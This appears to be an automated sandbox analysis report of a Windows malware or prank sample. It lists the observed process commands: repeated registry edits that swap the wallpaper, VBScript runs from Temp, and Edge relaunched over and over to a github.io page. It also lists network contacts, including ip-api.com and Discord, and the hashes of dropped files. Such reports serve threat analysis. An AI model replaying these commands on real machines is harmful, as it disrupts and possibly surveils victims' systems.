"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7136 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| NL | 172.217.23.195:443 | gstatic.com | tcp |
| US | 35.227.215.6:443 | image.noelshack.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| HU | 217.65.97.74:443 | ddl8.data.hu | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.135.232:443 | discord.com | tcp |
| NL | 52.111.243.29:443 | tcp | |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 185.199.109.153:80 | theshitposter78.github.io | tcp |
| US | 185.199.109.153:80 | theshitposter78.github.io | tcp |
| US | 8.8.8.8:53 | githubstatus.com | udp |
| US | 8.8.8.8:53 | help.github.com | udp |
| N/A | 224.0.0.251:5353 | udp |
Files
C:\Users\Admin\AppData\Local\Temp\8BD5.tmp\8BD6.tmp\8BD7.bat
| MD5 | 0a45f9a236bbcd265c0c42f31a98b97f |
| SHA1 | c959b0487c1ab6ed111bee3d1f80bcc3032125a4 |
| SHA256 | 38e4173ae8927a3bea9499ab2b9141d8f42f39383478633b0a4b98c0c661d0ff |
| SHA512 | 2935422f584afd8fde06d8838621c94205aa2ae67397b1d3ed3cb2e4d80d67e53d84cef2eaae4d3ea3c4dfc5e9282d712aab458dcd29660f9ae1215258fa1c72 |
memory/4348-2-0x000002C119870000-0x000002C1198B0000-memory.dmp
memory/4348-3-0x00007FFAA00A3000-0x00007FFAA00A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\21446.vbs
| MD5 | 5f54089b9a444209633e886792a8505b |
| SHA1 | 3e3d5003c67de8657661e28bc2350f0e4ea72ee3 |
| SHA256 | c3107e49aae33c8a125d968ff8643fdba3ecb8049172daf103f3389e2ec135c4 |
| SHA512 | f684d5a376b826fe5ff1bb2a3ac73d378ea3e546e0e6ff6c5a77f991967d1b1d68180b3ab465936c98b7438b4b540a62b697d047fd2bef31456f4498a77ec118 |
C:\Users\Admin\AppData\Local\Temp\14329.vbs
| MD5 | 93e179454db6fe9ac81112193de37cde |
| SHA1 | 4752aec95d506cac3ed9c61f0fbbd9cf6bd0cde9 |
| SHA256 | 8286f8a1d4cceae4ece0de6082109286f17c1234ee09e453ac9507185068c7cc |
